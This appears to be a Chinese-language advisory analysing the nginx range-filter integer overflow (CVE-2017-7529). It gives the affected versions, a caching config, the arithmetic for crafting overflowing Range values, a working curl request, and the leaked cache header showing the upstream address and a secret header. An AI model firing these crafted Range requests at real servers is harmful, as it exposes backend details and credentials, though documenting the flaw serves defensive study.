Nginx range过滤器整形溢出漏洞 (CVE–2017–7529)预警分析

Nginx range过滤器整形溢出漏洞 (CVE–2017–7529)预警分析

1. 漏洞说明

当使用nginx标准模块时,这允许攻击者如果从缓存返回响应,则获取缓存文件头,黑客可以通过缓存文件头获取包含IP地址的后端服务器或其他敏感信息,从而导致信息泄露。

2. 重现漏洞

重现条件
- Nginx版本:0.5.6 - 1.13.2
- 开启缓存功能
- 请求头中的Range按照一定规则整型溢出

重现的过程
- nginx配置文件如下:

http {
    proxy_cache_path  /home/nginx/tmp_cache  levels=1:2 keys_zone=cache_one:200m inactive=3d max_size=30g;

    server {
        listen       80;

        location /proxy/ {
            proxy_pass http://127.0.0.1:8001/index.html;
            proxy_cache cache_one;
            add_header X-Proxy-Cache $upstream_cache_status;
            proxy_hide_header x-nos-passwd;
            proxy_cache_valid 200 302 24h;
            proxy_cache_valid any 5m;
            expires 90d;
        }
    }
}
  • 确定文件长度并cache文件
$ curl "127.0.0.1/proxy/" -I

HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Wed, 19 Jul 2017 06:07:49 GMT
Content-Type: text/html
Content-Length: 558
Connection: keep-alive
Last-Modified: Tue, 02 May 2017 02:31:11 GMT
ETag: "5907ef6f-22e"
Expires: Tue, 17 Oct 2017 06:07:49 GMT
Cache-Control: max-age=7776000
X-Proxy-Cache: MISS
Accept-Ranges: bytes
  • 构造溢出的Range
1. 文件长度是558
2. 构造第一段的range为-958,因为958-558=400,即获取cache文件偏移之前的400字节,包含cache的头部内容
3. 第二段的range为0x8000000000000000-958=9223372036854774850,取负数即可
  • 重现bug
$ curl -v "127.0.0.1/proxy/" -r -958,-9223372036854774850

* About to connect() to 127.0.0.1 port 80 (#0)
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> GET /proxy/ HTTP/1.1
> Range: bytes=-958,-9223372036854774850
> User-Agent: curl/7.29.0
> Host: 127.0.0.1
> Accept: */*
> 
< HTTP/1.1 206 Partial Content
< Server: nginx/1.7.10
< Date: Wed, 19 Jul 2017 06:23:14 GMT
< Content-Type: multipart/byteranges; boundary=00000000000000000569
< Connection: keep-alive
< Last-Modified: Tue, 02 May 2017 02:31:11 GMT
< ETag: "5907ef6f-22e"
< Expires: Tue, 17 Oct 2017 06:23:14 GMT
< Cache-Control: max-age=7776000
< X-Proxy-Cache: HIT
* no chunk, no close, no size. Assume close to signal end
< 

--00000000000000000569
Content-Type: text/html
Content-Range: bytes -400-557/558

22e"
KEY: http://127.0.0.1:8001/index.html
HTTP/1.1 200 OK
Server: openresty/1.11.2.2
Date: Wed, 19 Jul 2017 06:07:49 GMT
Content-Type: text/html
Content-Length: 558
Last-Modified: Tue, 02 May 2017 02:31:11 GMT
Connection: close
ETag: "5907ef6f-22e"
x-nos-passwd: chenjianfei
Accept-Ranges: bytes

DOCTYPE html>
<html>
<head>
<title>Welcome to OpenResty!title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
style>
head>
<body>
<h1>Welcome to OpenResty!h1>
<p>If you see this page, the OpenResty web platform is successfully installed and
working. Further configuration is required.p>

<p>For online documentation and support please refer to
<a href="https://openresty.org/">openresty.orga>.<br/>

<p><em>Thank you for flying OpenResty.em>p>
body>
html>

--00000000000000000569
Content-Type: text/html
Content-Range: bytes -9223372036854774292-557/558

* Closing connection 0

3. 漏洞影响

可以发现上面的请求暴露了这些信息:
- upstream真实的ip和端口(KEY: http://127.0.0.1:8001/index.html)
- upstream返回的头部信息(x-nos-passwd: chenjianfei 等)

主要影响开启cache的相应版本的nginx。

ref:

  • http://4hou.win/wordpress/?p=4769
  • https://bbs.aliyun.com/read/321548.html

你可能感兴趣的:(程序设计,程序调试,系统运维)